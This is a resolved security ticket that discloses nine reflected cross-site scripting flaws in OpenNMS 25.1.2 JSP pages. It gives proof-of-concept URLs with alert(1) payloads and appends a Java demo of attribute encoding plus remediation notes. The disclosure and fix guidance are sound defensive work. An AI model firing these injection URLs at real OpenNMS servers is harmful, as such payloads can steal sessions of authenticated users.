Details
Sub-task
Status: Resolved
Major
Resolution: Fixed
Security Level: Default (Default Security Scheme)
Horizon 2020 - March 18th, Horizon 2020 - April 1st
Description
## Reflected Cross-Site Scripting
We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:
load-assets.jsp:
https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp
resultsIndexNoCount.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp
resultsIndex.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp
notification-box.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp
### 1. load-assets.jsp
There are 2 reflected XSS issues in the file `load-assets.jsp`.
Both issues can be triggered without authentication.
The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`
The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`
### 2. resultsIndexNoCount.jsp
There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.
The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
### 3. resultsIndex.jsp
There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.
The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`
The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`
The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`
### 4. notification-box.jsp
There is 1 XSS issue in the file `notification-box.jsp`, and it can be triggered via the GET parameter `node` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`
Information about fixing XSS issues can be found here:
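
Most of the URLs above use `%22%3E` to close a double-quoted attribute before injecting markup. The following Java program is an added example, not OpenNMS code and not part of the original report; it shows that behaviour next to output encoding applied at render time. The class `AttrEncodingDemo`, its methods and the `<input>` template are hypothetical and stand in for whatever markup the JSPs actually emit.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Added example: hypothetical rendering helper, not taken from the OpenNMS JSPs.
public class AttrEncodingDemo {

    // Encode every character that can close a quoted attribute or open a tag.
    static String escapeHtmlAttr(String value) {
        if (value == null) return "";
        StringBuilder out = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Assumed template: the parameter lands inside a double-quoted attribute.
    static String render(String value, boolean encode) {
        return "<input type=\"hidden\" name=\"" + (encode ? escapeHtmlAttr(value) : value) + "\"/>";
    }

    // Heuristic check for this template only: a second '<' means new markup was introduced.
    static boolean breaksOut(String html) {
        return html.indexOf('<', 1) >= 0;
    }

    public static void main(String[] args) {
        // Parameter values copied from the query strings in the report, still URL-encoded.
        String[] reported = {
            "test%22%3E%3Csvg/onload=alert(1)%3E",
            "b%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
        };
        for (String raw : reported) {
            String value = URLDecoder.decode(raw, StandardCharsets.UTF_8);
            System.out.println("raw     breaksOut=" + breaksOut(render(value, false)) + "  " + render(value, false));
            System.out.println("encoded breaksOut=" + breaksOut(render(value, true)) + "  " + render(value, true));
        }
    }
}
```

In a JSP the same encoding is available through JSTL, for example `<c:out value="${param.node}"/>` or `${fn:escapeXml(param.node)}`. HTML encoding covers HTML element and attribute contexts only; a value written into a script block or a URL needs the encoder for that context.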